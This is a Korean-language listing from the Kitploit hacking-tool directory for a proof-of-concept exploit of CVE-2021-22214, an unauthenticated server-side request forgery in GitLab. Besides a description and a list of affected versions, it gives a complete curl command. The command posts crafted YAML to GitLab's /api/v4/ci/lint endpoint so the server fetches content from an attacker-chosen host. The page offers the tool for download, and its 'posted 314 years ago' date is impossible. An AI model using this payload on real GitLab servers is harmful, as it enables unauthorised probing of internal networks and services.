Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
GitLab-SSRF-CVE-2021-22214 — # CVE-2021-22214 개념 증명 익스플로잇 GitLab 웹훅의 서버 측 요청 위조(SSRF) 취약점으로, 인증되지 않은 공격자가 내부 HTTP 요청을 보낼 수 있게 해줍니다. | Kitploit
도구/GitHubGitHub/kh4sh3i/gitlab-ssrf-cve-2021-22214
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringWeb Security
GitHubkh4sh3i/gitlab-ssrf-cve-2021-22214

GitLab-SSRF-CVE-2021-22214

# CVE-2021-22214 개념 증명 익스플로잇 GitLab 웹훅의 서버 측 요청 위조(SSRF) 취약점으로, 인증되지 않은 공격자가 내부 HTTP 요청을 보낼 수 있게 해줍니다.

저장소 보기
웹사이트
314년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2021-22214

CVE-2021-22214용 POC: Gitlab SSRF

설명

원격 GitLab 설치에는 내부 네트워크의 웹훅이 활성화되어 있어 서버 측 요청 위조(SSRF) 취약점이 존재합니다. 원격의 인증되지 않은 공격자는 등록이 제한된 GitLab 인스턴스를 악용하여 공격자가 선택한 임의의 도메인으로 HTTP 요청을 보내도록 만들 수 있습니다.

사용법

  • python 코드

    root@kitploit:~
    사용법:   python3 GitLab_SSRF.py <대상> <burp_collaborator_url>
    
  • Curl 명령

root@kitploit:~
curl -s –show-error -H 'Content-Type: application/json' https://TargetIP/api/v4/ci/lint –data '{ "include_merged_yaml": true, "content": "include:\n remote: http://Burp-Collaborator/test.yml"}' 

영향

  • Gitlab >=10.5, <13.10.5
  • Gitlab >=13.11, <13.11.5
  • Gitlab >=13.12, <13.12.2

참고

  • GitLab SSRF (CVE-2021-22214)
  • tenable.com
도구 다운로드